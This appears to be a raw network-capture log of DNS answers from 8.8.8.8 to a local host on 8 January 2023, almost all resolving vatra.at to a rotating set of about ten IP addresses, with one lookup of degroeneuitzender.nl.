Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:19.425726891 CET	8.8.8.8	192.168.2.4	0x48b0	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:21.406945944 CET	8.8.8.8	192.168.2.4	0x2fa7	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.100198984 CET	8.8.8.8	192.168.2.4	0x43cc	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:29.923669100 CET	8.8.8.8	192.168.2.4	0xe3a6	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:31.080674887 CET	8.8.8.8	192.168.2.4	0xcb46	No error (0)	degroeneuitzender.nl	5.135.247.111	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:33.439090014 CET	8.8.8.8	192.168.2.4	0x6c34	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:34.692118883 CET	8.8.8.8	192.168.2.4	0xb0c3	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:35.079653025 CET	8.8.8.8	192.168.2.4	0xe537	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:36.802289963 CET	8.8.8.8	192.168.2.4	0x45f8	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	211.40.39.251	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	211.171.233.129	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	84.224.236.42	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	109.102.255.230	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	151.251.24.5	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	187.232.183.160	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:38.006567955 CET	8.8.8.8	192.168.2.4	0x249c	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:39.313945055 CET	8.8.8.8	192.168.2.4	0xbb75	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:40.419629097 CET	8.8.8.8	192.168.2.4	0x8e50	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:41.550576925 CET	8.8.8.8	192.168.2.4	0x4ca6	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:43.445261955 CET	8.8.8.8	192.168.2.4	0xa1ce	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:45.392477036 CET	8.8.8.8	192.168.2.4	0x6065	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	211.40.39.251	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	211.171.233.129	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	84.224.236.42	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	109.102.255.230	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	151.251.24.5	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	187.232.183.160	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:47.365782976 CET	8.8.8.8	192.168.2.4	0x68cf	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:49.034532070 CET	8.8.8.8	192.168.2.4	0x177	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	211.119.84.112	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:50.390979052 CET	8.8.8.8	192.168.2.4	0xf541	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	187.170.238.164	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	185.95.186.58	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	200.46.66.71	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	109.98.58.98	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	175.119.10.231	A (IP address)	IN (0x0001)	false
Jan 8, 2023 16:15:51.363027096 CET	8.8.8.8	192.168.2.4	0xe6ca	No error (0)	vatra.at	222.236.49.124	A (IP address)	IN (0x0001)	false
